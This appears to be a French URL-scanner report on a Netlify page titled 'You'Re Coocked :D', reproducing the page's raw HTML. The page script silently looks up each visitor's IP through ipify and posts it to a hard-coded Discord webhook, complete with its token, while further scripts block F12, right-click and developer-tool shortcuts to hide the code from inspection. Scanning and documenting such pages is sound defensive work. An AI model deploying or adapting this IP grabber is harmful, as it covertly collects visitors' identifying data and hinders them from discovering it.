- ID de l'analyse :
- 172c4e46-eedb-4de5-88bd-b49c36567620Terminée
- URL soumise :
- https://rbxgeo.netlify.app/
- Fin du rapport :
Liens : 0 trouvé(s)
Liens sortants identifiés à partir de la page
Variables JavaScript : 5 trouvée(s)
Les variables JavaScript globales chargées dans l'objet fenêtre d'une page sont des variables déclarées en dehors des fonctions et accessibles depuis n'importe quel endroit du code au sein du champ d'application actuel
Nom | Type |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
sendToDiscord | function |
disableRightClick | function |
Messages de journal de console : 4 trouvé(s)
Messages consignés dans la console web
Type | Catégorie | Enregistrement |
---|---|---|
error | network |
|
log | other |
|
error | network |
|
error | other |
|
HTML
Le corps HTML de la page en données brutes
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>You'Re Coocked :D</title>
</head>
<body>
<h1></h1>
<script>
// Replace this with your Discord webhook URL
const webhookURL = 'https://discord.com/api/webhooks/1285137384803012618/f4socKKRgToMG-Giq-JnU-hy16hSxIBBp4wViGj_KQJaGTnoezEmc-XrY0LLsRgxwh4C';
// Function to send the IP address to the Discord webhook
function sendToDiscord(ip) {
const data = {
content: `User's IP Address: ${ip}`,
};
// Send IP to the Discord webhook via POST request
fetch(webhookURL, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify(data),
})
.then(response => {
if (response.ok) {
console.log('IP sent to Discord successfully.');
} else {
console.error('Failed to send IP to Discord.');
}
})
.catch(error => console.error('Error:', error));
}
// Get user's IP using the ipify API
fetch('https://api.ipify.org?format=json')
.then(response => response.json())
.then(data => {
const ip = data.ip;
console.log('User IP Address:', ip);
// Send the IP to the Discord webhook
sendToDiscord(ip);
})
.catch(error => console.error('Error fetching IP:', error));
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title></title>
<h1></h1>
<script>
// Listen for keydown events
document.addEventListener('keydown', function(event) {
// Check if F12 (keyCode 123) is pressed
if (event.key === "F12" || event.keyCode === 123) {
// Prevent the default action of opening the developer tools
event.preventDefault();
// Redirect to Google
window.location.href = 'https://tynauri.net';
}
});
// Optional: Detect right-click to prevent inspecting elements via context menu
document.addEventListener('contextmenu', function(event) {
event.preventDefault(); // Disable right-click
});
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title></title>
<script>
// Function to disable right-click
function disableRightClick(event) {
event.preventDefault(); // Prevent the default context menu from appearing
alert("Right-click is disabled on this page."); // Optional alert
}
// Attach the event listener when the page loads
window.onload = function() {
document.addEventListener('contextmenu', disableRightClick);
};
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Disable Inspect Methods</title>
<script>
// Disable right-click and keyboard shortcuts
document.addEventListener('contextmenu', function(event) {
event.preventDefault(); // Disable right-click
});
document.addEventListener('keydown', function(event) {
if (event.key === 'F12' ||
(event.ctrlKey && (event.key === 'i' || event.key === 'u')) ||
(event.shiftKey && event.ctrlKey && event.key === 'i')) {
event.preventDefault(); // Disable F12 and Ctrl+Shift+I, Ctrl+U
}
});
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script>
document.addEventListener('keydown', function(event) {
// Check if Ctrl + Shift + I is pressed
if (event.ctrlKey && event.shiftKey && event.key === 'I') {
event.preventDefault(); // Prevent the default action
alert("Developer Tools are disabled on this page.");
}
});
</script>
</body></html>